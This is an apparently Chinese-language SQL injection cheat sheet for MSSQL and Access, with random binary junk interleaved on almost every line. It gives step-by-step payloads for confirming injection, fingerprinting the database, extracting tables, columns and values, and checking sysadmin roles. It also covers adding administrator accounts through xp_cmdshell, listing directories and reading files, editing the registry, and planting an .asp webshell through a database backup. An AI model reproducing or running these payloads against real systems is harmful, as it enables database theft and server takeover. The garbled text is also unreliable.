1.判断是否有注入;and 1=1 ;and 1=2 �y~ZYI]`
J
2.初步判断是否是mssql ;and user>0 -%g&O-i��\
S~+er{,ht4
3.注入参数是字符'and [查询条件] and ''=' �|���_�� u
BA��
9c-Ay
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �?-HLP%C('
$QB~ x{v@n
5.判断数据库系统 �
�`[�=�3_
�+YA,HhX9�
;and (select count(*) from sysobjects)>0 mssql zP(U�aSXz/
d2!A���32m
;and (select count(*) from msysobjects)>0 access v.��~uJ.T�
j��$u=7Z&E
[G=+��f6 a
^jiY�cg@_[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <�8[y2|UBt
$�ZEwz;HNo
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 rC�TH 5"��
l)����^sE)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6|O2�i j-J
U/|;u�;H=�
9.(1)猜字段的ascii值(access) i4XE26B;�e
4EZl
(v"f`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %9qG|�A,cA
},�;ymk|g[
(2)猜字段的ascii值(mssql) J_H=GH�Mp}
e~+VN4D&b>
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
�8FmRD��
Az��mIS��m
10.测试权限结构(mssql) 9��:�\YEs"
��PU\?eA�
:�q�QpBr$�
hj_�%'kk-A
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- y`n'>F�11�
x2M'!VK>n1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- d;-�/F b{4
7� z�#��Xf
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��ofu
�{g
n:#gKR-J�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Q#�2�gjR r
�;<9���dND
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ~�}g��"F�e
hA0g'X2eC�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- g+xA�0q�W�
"")I1�iO
g
;and 1=(select IS_MEMBER('db_owner'));-- bhq�s%B!�:
"�{&?t}rj+
j=�C��o���
�NdlJ�dq��
11.添加mssql和系统的帐户 �F*bmV>Q�q
s�?JN��c4q
;exec master.dbo.sp_addlogin username;-- n.�a55uy��
;exec master.dbo.sp_password null,username,password;-- jQgy=;?Lwm
i�O 9���fg
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- f�F"\�$�Ny
�<A�_L��Zi
;exec master.dbo.xp_cmdshell 'net user username password $<~o�,e�-4
oOU�?�6�nq
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fF�\�s5f#:
)U~,q>H+
%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �%�~`y82r6
>�C�1**�GQ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- zh�<[��/'l
eVVm"96Q.;
xXJl Qb��s
PZDj)x_%B&
12.(1)遍历目录 *&m{�)c�Ts
'|9f�DzW"]
;create table dirs(paths varchar(100), id int) rerl-��T<3
�(q@�DBb4
;insert dirs exec master.dbo.xp_dirtree 'c:\' �)G
a%Eg9�
_Kw<4�$0<p
;and (select top 1 paths from dirs)>0 B}(+�\Q$I
[Y��sN c��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 2[��#7YWs
(eOznt�p�8
�,Qd�;t���
2GHm�A�_7P
(2)遍历目录 '}T�f9L�%�
POl[]ni�=>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �$��Eo�)�i
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��!D_�Qa�t
C|@6r�r9TA
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "8��'aZ.P
|BO!q9633V
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �]4$t'w�I.
905%�5��\Y
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �R43yr+�p�
K_fQ�Fuj�+
#K5)Rb-��H
}=+J&�c��R
13.mssql中的存储过程 ?�3x7_=4t@
"��-pQL )f
xp_regenumvalues 注册表根键, 子键 �}AZ0BI,TI
aMx��g6\8�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Q1?0R<jOU�
�k4:e�0Wd�
xp_regread 根键,子键,键值名 zB8 @�W�l
h7�}D//�~p
;exec xp_regread �aB��H!K
�
x�/Um�pJD+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?D6�?W��6@
c%��5G�3�j
xp_regwrite 根键,子键, 值名, 值类型, 值 � ��&Ow[��
.?�?[qBOTE
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �K�KPQ�[3g
Y6�>@zz�nk
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #LGAvFA*_F
fO�;#;��p.
xp_regdeletevalue 根键,子键,值名 �q1���3b�V
fG+/p 0sJ?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |�Sne\N�>%
�-*Vo�ui��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �SnK#YQCDt
C6$�F.��v�
aCq )� hR�
v�y
�<(�1\
14.mssql的backup创建webshell <3[�,bTIk�
�i�#���u�c
use model ?�!h
jI;_&
aSKLSl't`
create table cmd(str image); �s$�V�'|Pt
�}6�7lL�~L
insert into cmd(str) values (''); 0� e}N{,&Y
l(o#N'!j4
backup database model to disk='c:\l.asp'; 7�)2Co��[t
_I"T(2Au��
n#�{�z�"G�
Q�x
B0I/
{
15.mssql内置函数 |wnXBKV(��
xJ�Q-k/`
;and (select @@version)>0 获得Windows的版本号 &2~�c,] 9C
5#Dta�Vz�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa w?r�������
D4�@'C�4kL
;and (select user_name())>0 爆当前系统的连接用户 &�!@�7+'])
J6WyFtlyLc
;and (select db_name())>0 得到当前连接的数据库 ^�7�q�qO%
cZd9A(�1"^
�@w8M�O�T$
)L)jv�Cw,e
16.简洁的webshell W^�e�s"��\
�5uV�Sbo�.
use model 7K� 8t��z}
"sM�
3N��Y
create table cmd(str image); *J ]2�"~_.
J��u�0�W
insert into cmd(str) values (''); ��F8c�^M</
=B+^-2G�8�
backup database model to disk='g:\wwwtest\l.asp';
